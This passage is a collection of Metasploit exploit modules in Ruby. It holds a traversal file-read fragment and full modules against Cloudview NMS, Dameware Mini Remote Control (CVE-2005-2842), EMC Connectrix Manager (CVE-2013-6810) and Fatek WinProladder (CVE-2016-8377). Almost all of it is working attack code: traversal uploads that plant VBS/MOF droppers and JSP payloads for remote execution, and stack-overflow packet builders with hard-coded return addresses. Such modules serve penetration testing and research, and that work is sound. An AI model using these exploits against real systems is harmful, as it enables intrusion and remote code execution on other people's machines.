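		# strict_encode64: Base64.encode64 appends a newline (and wraps at 60
		# characters), and that whitespace ended up inside the header value.
		credentials = Base64.strict_encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")

		levels = "/" + ("../" * traversal_depth)
		target_file = datastore['FILE'].to_s

		res = send_request_raw({
			'method'	=> 'GET',
			'uri'		=> "#{levels}#{target_file}?res=&valid=true",
			'headers'	=>	{
				'Authorization'	=>	"Basic #{credentials}"
			},
		})

		unless res && res.code == 200
			print_error("#{rhost}:#{rport} did not return #{target_file} (#{res ? res.code : 'no response'})")
			return
		end

		loot = res.body
		if loot.nil? || loot.empty?
			print_status("File from #{rhost}:#{rport} is empty...")
			return
		end

		file = ::File.basename(target_file)
		path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, target_file)
		print_status("Stored #{target_file} to #{path}")
	end
end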

            
require 'msf/core'

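class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::WbemExec

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cloudview NMS File Upload',
			'Description'    => %q{
				This module exploits a file upload vulnerability
				found within Cloudview NMS < 2.00b. The vulnerability
				is triggered by sending specialized packets to the
				server with directory traversal sequences (..@ in
				this case) to browse outside of the web root.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'URL', '0day' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Cloudview NMS 2.00b on Windows', {} ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 13 2014'))

		register_options([
			Opt::RPORT(80),
			OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
			OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
		], self.class )
	end

	# Issues the ChangeDir request that selects the server-side directory the
	# next upload lands in. +dir+ uses '@' as the separator, exactly as the
	# original module's two hard-coded requests did.
	#
	# @param dir [String] directory expression to pass to ChangeDir
	# @return [Rex::Proto::Http::Response, nil]
	def change_dir(dir)
		send_request_cgi({
			'method'	=> 'GET',
			'uri'		=> "/MPR=#{@sess}:/descriptor!ChangeDir=#{dir}!-!-!@extdir%5Cfilelistpage!-!1000",
			'version'	=> '1.1',
		})
	end

	# Multipart-uploads +content+ under +name+ into the directory selected by
	# the last change_dir call.
	#
	# @param name [String] filename sent in the Content-Disposition header
	# @param content [String] file body
	# @return [Boolean] true when the server body acknowledges the upload
	def upload_file(name, content)
		data = Rex::MIME::Message.new
		data.add_part(content.to_s, "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{name}\"")
		# Same boundary cleanup as the original module.
		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

		res = send_request_cgi({
			'method'	=>	'POST',
			'uri'		=>	"/MPR=#{@sess}:/",
			'version'	=>	'1.1',
			'ctype'		=>	"multipart/form-data; boundary=#{data.bound}",
			'data'		=>	post_data
		})

		# A nil response (timeout, reset) was dereferenced unconditionally in
		# the original and raised NoMethodError instead of a module message.
		!!(res && res.body =~ /Uploaded file OK/)
	end

	# Logs in, uploads the VBS dropper, then uploads the MOF that references
	# it. The two upload steps were duplicated inline in the original; they
	# now share change_dir/upload_file. Messages and their order are unchanged.
	def exploit

		# setup
		vbs_name	= rand_text_alpha(rand(10)+5) + '.vbs'
		exe			= generate_payload_exe
		vbs_content	= Msf::Util::EXE.to_exe_vbs(exe)
		mof_name	= rand_text_alpha(rand(10)+5) + '.vbs'
		mof			= generate_mof(mof_name, vbs_name)
		peer		= "#{datastore['RHOST']}:#{datastore['RPORT']}"

		print_status("Uploading #{vbs_name} to #{peer}...")

		# logging in to get the "session"; the id is chosen client-side and the
		# login response itself is not inspected (as in the original)
		@sess = rand(0..2048)
		send_request_cgi({
			'method'	=>	'POST',
			'uri'		=>	"/MPR=#{@sess}:/",
			'version'	=>	'1.1',
			'ctype'		=>	'application/x-www-form-urlencoded',
			'data'		=>	"username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
		})

		# This is needed to setup the upload directory
		change_dir("C:@..@..@..@WINDOWS@system32@")

		unless upload_file(vbs_name, vbs_content)
			print_error("Something went wrong...")
			return
		end
		print_good("Uploaded #{vbs_name} successfully!")
		print_status("Uploading #{mof_name} to #{peer}...")

		# Setting up upload directory
		change_dir("C:@..@..@..@WINDOWS@system32@wbem@mof@")

		if upload_file(mof_name, mof)
			print_good("Uploaded #{mof_name} successfully!")
		else
			print_error("Something went wrong...")
		end

	end

end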

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	# Module metadata. The selected target's 'Ret' is the only target-specific
	# value and is consumed by #pkt1.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow vulnerability found
				in Dameware Mini Remote Control v4.0. The overflow is caused when sending
				an overly long username to the DWRCS executable listening on port 6129.
				The username is read into a strcpy() function causing an overwrite of
				the return pointer leading to arbitrary code execution.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'CVE', '2005-2842' ],
					[ 'BID', '14707' ],
					[ 'URL', 'http://secunia.com/advisories/16655' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					# 140 bytes written at offset 108 of the 259-byte field in #pkt1
					# stays inside that field (108 + 140 = 248).
					'Space'	=> 140,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'        =>
						{
							'SymbolLookup' => '+ws2ord',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows XP SP3 EN', 
							{ 
								# msvcrt.dll
								# push esp/ retn
								'Ret' => 0x77c35459, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			# NOTE(review): "Sept" is not the three-letter month form ("Sep")
			# used by the other modules on this page — confirm it parses.
			'DisclosureDate' => 'Sept 01 2005'))

		register_options(
			[
				Opt::RPORT(6129),
			], self.class )
	end

	# Builds the first packet: a fixed 4056-byte frame filled in at explicit
	# offsets. The 259-byte field at offset 456 is the one carrying the
	# target's 'Ret' (at field offset 100) and the encoded payload (from
	# field offset 108); the other 259-byte fields are random filler.
	#
	# @return [String] the packet bytes
	def pkt1
		p = payload.encoded

		boom = "\x43" * 259
		# little-endian 'Ret' from the selected target
		boom[100, 4] = [target.ret].pack('V')
		boom[108, p.length] = p

		packet = "\x00" * 4056
		# fixed header words; their meaning is not documented in the module
		packet[0, 4] = "\x30\x11\x00\x00"
		packet[4, 4] = "\x00\x00\x00\x00"
		packet[8, 4] = "\xd7\xa3\x70\x3d"
		packet[12, 4] = "\x0a\xd7\x0d\x40"
		packet[16, 20] = "\x00" * 20
		packet[36, 4] = "\x01\x00\x00\x00"

		packet[40, 4] = [0x00002710].pack('V')
		packet[196, 259] = rand_text_alpha(259)
		packet[456, 259] = boom
		packet[716, 259] = rand_text_alpha(259)
		packet[976, 259] = rand_text_alpha(259)
		packet[1236, 259] = rand_text_alpha(259)
		packet[1496, 259] = rand_text_alpha(259)

		return packet
	end

	# Builds the second packet: 4096 zero bytes with a random 259-byte field
	# at offset 756.
	#
	# @return [String] the packet bytes
	def pkt2
		packet = "\x00" * 4096
		packet[756, 259] = rand_text_alpha(259)

		return packet
		
	end

	# Sends both packets over the raw TCP connection; the replies are read
	# and discarded, then the payload handler is started.
	def exploit
		connect

		sock.put(pkt1)
		sock.recv(1024)
		sock.put(pkt2)
		sock.recv(84)

		handler
		disconnect
	end

end
__END__

            
require 'msf/core'

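class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC CMCNE FileUploadController Remote Code Execution',
			'Description'    => %q{
				This module exploits a fileupload vulnerability found in EMC
				Connectrix Manager Converged Network Edition <= 11.2.1. The file
				upload vulnerability is triggered when sending a specially crafted
				filename to the FileUploadController servlet.  This allows the
				attacker to upload a malicious jsp file to anywhere on the remote
				file system.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'james fitts' ],
			'References'     =>
				[
					[ 'ZDI', '13-279' ],
					[ 'CVE', '2013-6810' ]
				],
			'Privileged'	=> true,
			'Platform' 	=> 'win',
			'Arch'	=> ARCH_JAVA,
			'Targets'	=>
				[
					[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 18 2013'))

		register_options([
			Opt::RPORT(80)
		], self.class)
	end

	# Uploads the JSP payload through FileUploadController.do using a
	# traversal filename, then requests it under dcm-client so it runs.
	# Mixed tab/space indentation of the original has been normalised.
	def exploit
		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
		# Relative path from the servlet's upload location into the deployed
		# dcm-client.war, as in the original module.
		deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
		# Line breaks are stripped from the JSP — presumably so the multipart
		# body's line structure is left intact.
		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
		@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"

		data = Rex::MIME::Message.new
		data.add_part(jsp, "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
		data.add_part(rand_text_alpha_upper(5), nil, nil, "form-data; name=\"driverFolderName\"")

		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

		print_status("#{peer} - Uploading the JSP Payload...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => normalize_uri("HttpFileUpload", "FileUploadController.do"),
			'ctype'     => "multipart/form-data; boundary=#{data.bound}",
			'data'      => post_data
		})

		# A nil response (timeout, reset) was dereferenced unconditionally in
		# the original and raised NoMethodError instead of a module message.
		unless res && res.code == 200 && res.body =~ /SUCCESSFULLY UPLOADED FILES!/
			print_error("Does not look like the files were uploaded to #{peer}...")
			return
		end

		print_good("File uploaded successfully!")
		print_status("Executing '#{@jsp_name}' now...")
		send_request_cgi({
			'method'	=> 'GET',
			'uri'		=> normalize_uri("dcm-client", @jsp_name)
		})
	end

end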

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::TcpServer

	# Module metadata. This is a server-side module: it listens on SRVPORT and
	# responds to connecting clients in #on_client_data.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow found in Fatek Automation
				PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
				connects to a listening server. The client does not properly sanitize the length
				of the received input prior to placing it on the stack.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'ZDI', '16-672' ],
					[ 'CVE', '2016-8377' ],
					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					# 1000 bytes written from offset 1150 of the 10000-byte buffer
					# built in #on_client_data.
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 7 EN', 
							{
								# CC3250MT.dll
								# pop ecx/ pop ebp/ retn
								'Ret' => 0x32514d79
							} 
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Dec 15 2016'))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
			], self.class)
	end

	# Called by TcpServer when a connected client sends data. Writes one
	# 10000-byte response patched at fixed offsets — a 4-byte short jump at
	# 1092, the target's 'Ret' at 1096, 50 bytes of 0x90 at 1100 and the
	# encoded payload at 1150 — then starts the handler and drops the client.
	#
	# @param client [Rex::Socket] the connected client socket
	def on_client_data(client)
		p = payload.encoded

		pkt = "A" * 10000
		pkt[1092, 4] = [0x04eb9090].pack('V')	# jmp $+6
		pkt[1096, 4] = [target.ret].pack('V')
		pkt[1100, 50] = "\x90" * 50
		pkt[1150, p.length] = p

		client.put(pkt)
		handler
		service.close_client(client)
	end

end

            
require 'msf/core'

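class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
			'Description'    => %q{
				This module exploits a file upload vulnerability found in EMC 
				Connectrix Manager Converged Network Edition <= 11.2.1. The file
				upload vulnerability is triggered when sending a specially crafted
				filename to the FileUploadController servlet found within the 
				Inmservlets.war archive. This allows the attacker to upload a
				specially crafted file which leads to remote code execution in the
				context of the server user.
			},
			'Author'		 => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'ZDI', '13-280' ],
					[ 'CVE', '2013-6810' ]
				],
			'Privileged'	=> true,
			'Platform' 	=> 'win',
			'Arch'	=> ARCH_JAVA,
			'Targets'	=>
				[
					[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 18 2013'))

		register_options([
			Opt::RPORT(80)
		], self.class)
	end

	# Uploads the JSP payload through the inmservlets FileUploadController
	# (with the ROOTDIR header set to ftproot) using a traversal filename,
	# then requests it under dcm-client so it runs. Mixed tab/space
	# indentation of the original has been normalised.
	def exploit
		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
		# Relative path from the servlet's upload location into the deployed
		# dcm-client.war, as in the original module.
		deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
		# Line breaks are stripped from the JSP — presumably so the multipart
		# body's line structure is left intact.
		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
		@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"

		data = Rex::MIME::Message.new
		data.add_part(jsp, nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")

		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

		print_status("#{peer} - Uploading the JSP Payload...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => normalize_uri("inmservlets", "FileUploadController"),
			'ctype'     => "multipart/form-data; boundary=#{data.bound}",
			'data'      => post_data,
			'headers'	=> {
				'ROOTDIR'	=> "ftproot"
			}
		})

		# A nil response (timeout, reset) was dereferenced unconditionally in
		# the original and raised NoMethodError instead of a module message.
		unless res && res.code == 200 && res.body =~ /SUCCESSFULLY UPLOADED FILES!/
			print_error("Does not look like the files were uploaded to #{peer}...")
			return
		end

		print_good("File uploaded successfully!")
		print_status("Executing '#{@jsp_name}' now...")
		send_request_cgi({
			'method'	=> 'GET',
			'uri'		=> normalize_uri("dcm-client", @jsp_name)
		})
	end

end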